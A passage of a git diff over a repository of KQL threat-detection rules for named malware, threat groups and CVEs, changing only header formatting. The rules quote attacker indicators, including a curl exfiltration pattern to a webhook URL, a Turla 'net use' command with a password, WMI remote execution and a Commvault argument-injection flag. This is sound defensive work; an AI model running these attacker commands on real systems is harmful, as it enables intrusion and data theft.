Systems) -// Date: 2023-05-10 -// Level: critical -// Description: Detects SNAKE malware kernel driver file indicator -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: SNAKE Malware Kernel Driver File Indicator +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: critical +// Description: Detects SNAKE malware kernel driver file indicator +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath =~ "C:\\Windows\\System32\\Com\\Comadmin.dat" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql index fdd0e8b5..cc0b6221 100644 --- a/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql +++ b/KQL/rules-emerging-threats/Execution/snake_malware_werfault_persistence_file_creation.kql @@ -1,10 +1,10 @@ -// Title: SNAKE Malware WerFault Persistence File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-10 -// Level: high -// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats - -DeviceFileEvents +// Title: SNAKE Malware WerFault Persistence File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-10 +// Level: high +// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + +DeviceFileEvents | where (FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql index 405d7123..d72fcae8 100644 --- a/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql +++ b/KQL/rules-emerging-threats/Execution/trickbot_malware_activity.kql @@ -1,10 +1,10 @@ -// Title: Trickbot Malware Activity -// Author: Florian Roth (Nextron Systems) -// Date: 2020-11-26 -// Level: high -// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1559, detection.emerging-threats - -DeviceProcessEvents +// Title: Trickbot Malware Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2020-11-26 +// Level: high +// Description: Detects Trickbot malware process tree pattern in which "rundll32.exe" is a parent of "wermgr.exe" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559, detection.emerging-threats + +DeviceProcessEvents | where FolderPath endswith "\\wermgr.exe" and InitiatingProcessCommandLine contains "DllRegisterServer" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql index e618219e..a2602890 100644 --- a/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql +++ b/KQL/rules-emerging-threats/Execution/tropictrooper_campaign_november_2018.kql @@ -1,10 +1,10 @@ -// Title: TropicTrooper Campaign November 2018 -// Author: @41thexplorer, Microsoft Defender ATP -// Date: 2019-11-12 -// Level: high -// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.emerging-threats - -DeviceProcessEvents +// Title: TropicTrooper Campaign November 2018 +// Author: @41thexplorer, Microsoft Defender ATP +// Date: 2019-11-12 +// Level: high +// Description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine contains "abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql index 068b39ef..d12fb095 100644 --- a/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql +++ b/KQL/rules-emerging-threats/Execution/turla_group_lateral_movement.kql @@ -1,10 +1,10 @@ -// Title: Turla Group Lateral Movement -// Author: Markus Neis -// Date: 2017-11-07 -// Level: critical -// Description: Detects automated lateral movement by Turla group -// MITRE Tactic: Execution -// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats - -DeviceProcessEvents +// Title: Turla Group Lateral Movement +// Author: Markus Neis +// Date: 2017-11-07 +// Level: critical +// Description: Detects automated lateral movement by Turla group +// MITRE Tactic: Execution +// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats + +DeviceProcessEvents | where ProcessCommandLine startswith "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" " or (ProcessCommandLine contains "dir c:\\" and ProcessCommandLine contains ".doc" and ProcessCommandLine contains " /s") or (ProcessCommandLine contains "dir %TEMP%\\" and ProcessCommandLine contains ".exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql index f52fc752..d5447f08 100644 --- a/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql +++ b/KQL/rules-emerging-threats/Execution/unc2452_powershell_pattern.kql @@ -1,12 +1,12 @@ -// Title: UNC2452 PowerShell Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-01-20 -// Level: critical -// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: UNC2452 PowerShell Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-20 +// Level: critical +// Description: Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.t1047, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "Invoke-WMIMethod win32_process -name create -argumentlist" and ProcessCommandLine contains "rundll32 c:\\windows") or (ProcessCommandLine contains "wmic /node:" and ProcessCommandLine contains "process call create \"rundll32 c:\\windows") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql index 6d08322a..64384954 100644 --- a/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql +++ b/KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql @@ -1,10 +1,10 @@ -// Title: UNC2452 Process Creation Patterns -// Author: Florian Roth (Nextron Systems) -// Date: 2021-01-22 -// Level: high -// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.emerging-threats - -DeviceProcessEvents +// Title: UNC2452 Process Creation Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-22 +// Level: high +// Description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats + +DeviceProcessEvents | where ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".txt")) or ((ProcessCommandLine contains "7z.exe a -v500m -mx9 -r0 -p" or ProcessCommandLine contains "7z.exe a -mx9 -r0 -p") and (ProcessCommandLine contains ".zip" and ProcessCommandLine contains ".log")) or ((ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "C:\\Windows" and ProcessCommandLine contains ".dll,Tk_") and (InitiatingProcessCommandLine contains "wscript.exe" and InitiatingProcessCommandLine contains ".vbs")) or (ProcessCommandLine contains "cmd.exe /C " and (InitiatingProcessCommandLine contains "C:\\Windows" and InitiatingProcessCommandLine contains ".dll") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessCommandLine =~ "" and FolderPath endswith "\\dllhost.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql index 84f03c5d..1d8ce1ba 100644 --- a/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql +++ b/KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql @@ -1,12 +1,12 @@ -// Title: UNC4841 - Barracuda ESG Exploitation Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: high -// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: UNC4841 - Barracuda ESG Exploitation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects file indicators as seen used by UNC4841 during their Barracuda ESG zero day exploitation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "/11111.tar" or FolderPath endswith "/aacore.sh" or FolderPath endswith "/appcheck.sh" or FolderPath endswith "/autoins" or FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/etc/cron.daily/core_check.sh" or FolderPath endswith "/etc/cron.daily/core.sh" or FolderPath endswith "/etc/cron.hourly/aacore.sh" or FolderPath endswith "/etc/cron.hourly/appcheck.sh" or FolderPath endswith "/etc/cron.hourly/core.sh" or FolderPath endswith "/get_fs_info.pl" or FolderPath endswith "/imgdata.jpg" or FolderPath endswith "/install_att_v2.tar" or FolderPath endswith "/install_bvp74_auth.tar" or FolderPath endswith "/install_helo.tar" or FolderPath endswith "/install_reuse.tar" or FolderPath endswith "/intent_helo" or FolderPath endswith "/intent_reuse" or FolderPath endswith "/intentbas" or FolderPath endswith "/mod_attachment.lua" or FolderPath endswith "/mod_content.lua" or FolderPath endswith "/mod_require_helo.lua" or FolderPath endswith "/mod_rtf" or FolderPath endswith "/mod_sender.lua" or FolderPath endswith "/mod_udp.so" or FolderPath endswith "/nfsd_stub.ko" or FolderPath endswith "/resize_reisertab" or FolderPath endswith "/resize_risertab" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/rverify" or FolderPath endswith "/saslautchd" or FolderPath endswith "/sendscd" or FolderPath endswith "/snapshot.tar" or FolderPath endswith "/tmp/p" or FolderPath endswith "/tmp/p7" or FolderPath endswith "/tmp/t" or FolderPath endswith "/update_v2.sh" or FolderPath endswith "/update_v31.sh" or FolderPath endswith "/update_v35.sh" or FolderPath endswith "/update_version" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql index 79424796..6ddf36c6 100644 --- a/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql +++ b/KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql @@ -1,10 +1,10 @@ -// Title: UNC4841 - Email Exfiltration File Pattern -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: high -// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats - -DeviceFileEvents +// Title: UNC4841 - Email Exfiltration File Pattern +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: high +// Description: Detects filename pattern of email related data used by UNC4841 for staging and exfiltration +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.defense-evasion, detection.emerging-threats + +DeviceFileEvents | where FolderPath matches regex "/mail/tmp/[a-zA-Z0-9]{3}[0-9]{3}\\.tar\\.gz" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql index fc00805c..cc460d78 100644 --- a/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql +++ b/KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql @@ -1,12 +1,12 @@ -// Title: UNC4841 - Potential SEASPY Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-16 -// Level: critical -// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor -// MITRE Tactic: Execution -// Tags: attack.execution, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: UNC4841 - Potential SEASPY Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-16 +// Level: critical +// Description: Detects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "/BarracudaMailService" or FolderPath endswith "/resize2fstab" or FolderPath endswith "/resize_reisertab" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql index 202c6756..4f32f675 100644 --- a/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql +++ b/KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql @@ -1,12 +1,12 @@ -// Title: Ursnif Redirection Of Discovery Commands -// Author: @kostastsale -// Date: 2023-07-16 -// Level: high -// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Ursnif Redirection Of Discovery Commands +// Author: @kostastsale +// Date: 2023-07-16 +// Level: high +// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "/C " and (ProcessCommandLine contains " >> " and ProcessCommandLine contains "\\AppData\\local\\temp*.bin")) and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql index 9c8bac3d..0f4c6957 100644 --- a/KQL/rules-emerging-threats/Execution/zxshell_malware.kql +++ b/KQL/rules-emerging-threats/Execution/zxshell_malware.kql @@ -1,12 +1,12 @@ -// Title: ZxShell Malware -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2017-07-20 -// Level: critical -// Description: Detects a ZxShell start by the called and well-known function name -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: ZxShell Malware +// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro +// Date: 2017-07-20 +// Level: critical +// Description: Detects a ZxShell start by the called and well-known function name +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, attack.defense-evasion, attack.t1218.011, attack.s0412, attack.g0001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "zxFunction" or ProcessCommandLine contains "RemoteDiskXXXXX") and FolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql index 31e5a823..40984ec0 100644 --- a/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql +++ b/KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql @@ -1,12 +1,12 @@ -// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-09-24 -// Level: high -// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Shai-Hulud NPM Package Malicious Exfiltration via Curl +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-09-24 +// Level: high +// Description: Detects potential Shai Hulud NPM package attack attempting to exfiltrate data via curl to external webhook sites. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1041, attack.collection, attack.t1005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "curl" and ProcessCommandLine contains "-d" and ProcessCommandLine contains "webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7") and FolderPath endswith "/curl" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql index 682dd2a9..61cfef4f 100644 --- a/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql +++ b/KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql @@ -1,12 +1,12 @@ -// Title: FunkLocker Ransomware File Creation -// Author: Saiprashanth Pulisetti ( @Prashanthblogs) -// Date: 2025-08-08 -// Level: high -// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1486, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: FunkLocker Ransomware File Creation +// Author: Saiprashanth Pulisetti ( @Prashanthblogs) +// Date: 2025-08-08 +// Level: high +// Description: Detects the creation of files with the ".funksec" extension, which is appended to encrypted files by the FunkLocker ransomware. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ".funksec" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql index bf5f2f9e..d60a2944 100644 --- a/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql @@ -1,12 +1,12 @@ -// Title: LockerGoga Ransomware Activity -// Author: Vasiliy Burov, oscd.community -// Date: 2020-10-18 -// Level: critical -// Description: Detects LockerGoga ransomware activity via specific command line. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1486, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: LockerGoga Ransomware Activity +// Author: Vasiliy Burov, oscd.community +// Date: 2020-10-18 +// Level: critical +// Description: Detects LockerGoga ransomware activity via specific command line. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-i SM-tgytutrc -s" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql index 7e08e896..773d6450 100644 --- a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql +++ b/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Conti Ransomware Activity -// Author: frack113 -// Date: 2021-10-12 -// Level: critical -// Description: Detects a specific command used by the Conti ransomware group -// MITRE Tactic: Impact -// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Conti Ransomware Activity +// Author: frack113 +// Date: 2021-10-12 +// Level: critical +// Description: Detects a specific command used by the Conti ransomware group +// MITRE Tactic: Impact +// Tags: attack.impact, attack.s0575, attack.t1486, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "-m " and ProcessCommandLine contains "-net " and ProcessCommandLine contains "-size " and ProcessCommandLine contains "-nomutex " and ProcessCommandLine contains "-p \\\\" and ProcessCommandLine contains "$" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql index df55105f..525b7597 100644 --- a/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql +++ b/KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql @@ -1,12 +1,12 @@ -// Title: Potential Dtrack RAT Activity -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-30 -// Level: critical -// Description: Detects potential Dtrack RAT activity via specific process patterns -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Dtrack RAT Activity +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-30 +// Level: critical +// Description: Detects potential Dtrack RAT activity via specific process patterns +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "\\temp\\res.ip" and ProcessCommandLine matches regex "ipconfig\\s+/all") or (ProcessCommandLine contains "interface ip show config" and ProcessCommandLine contains "\\temp\\netsh.res") or ProcessCommandLine matches regex "ping\\s+-n.{6,64}echo EEEE\\s?>\\s?" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql index 19067c7b..70a91bea 100644 --- a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql +++ b/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql @@ -1,12 +1,12 @@ -// Title: Apache Spark Shell Command Injection - ProcessCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-20 -// Level: high -// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Apache Spark Shell Command Injection - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-20 +// Level: high +// Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2022-33891, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "id -Gn `" or ProcessCommandLine contains "id -Gn '") and InitiatingProcessFolderPath endswith "\\bash" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql index fa8662cb..a7410f63 100644 --- a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql +++ b/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql @@ -1,10 +1,10 @@ -// Title: Atlassian Confluence CVE-2022-26134 -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-03 -// Level: high -// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats - -DeviceProcessEvents +// Title: Atlassian Confluence CVE-2022-26134 +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-03 +// Level: high +// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2022-26134, detection.emerging-threats + +DeviceProcessEvents | where (ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "dash" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "zsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "fish" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wget" or ProcessCommandLine contains "python") and InitiatingProcessFolderPath endswith "/java" and InitiatingProcessFolderPath startswith "/opt/atlassian/confluence/" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql index 421b5713..f481a546 100644 --- a/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql +++ b/KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql @@ -1,11 +1,11 @@ -// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791) -// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-20 -// Level: high -// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791. -// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token. -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791 - -DeviceProcessEvents +// Title: Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791) +// Author: X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-20 +// Level: high +// Description: Detects the use of argument injection in the Commvault qlogin command - potential exploitation for CVE-2025-57791. +// An attacker can inject the `-localadmin` parameter via the password field to bypass authentication and gain a privileged token. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, detection.emerging-threats, cve.2025-57791 + +DeviceProcessEvents | where ProcessCommandLine contains "qlogin" and ProcessCommandLine contains " -cs " and ProcessCommandLine contains " -localadmin" and ProcessCommandLine contains " -clp " and ProcessCommandLine contains "_localadmin__" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql index 422b2798..f93775e5 100644 --- a/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql +++ b/KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql @@ -1,12 +1,12 @@ -// Title: CVE-2021-31979 CVE-2021-33771 Exploits -// Author: Sittikorn S, frack113 -// Date: 2021-07-16 -// Level: critical -// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: CVE-2021-31979 CVE-2021-33771 Exploits +// Author: Sittikorn S, frack113 +// Date: 2021-07-16 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryKey endswith "CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)" or RegistryKey endswith "CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)") and (not((RegistryValueData endswith "system32\\wbem\\wmiutils.dll" or RegistryValueData endswith "system32\\wbem\\wbemsvc.dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Initial 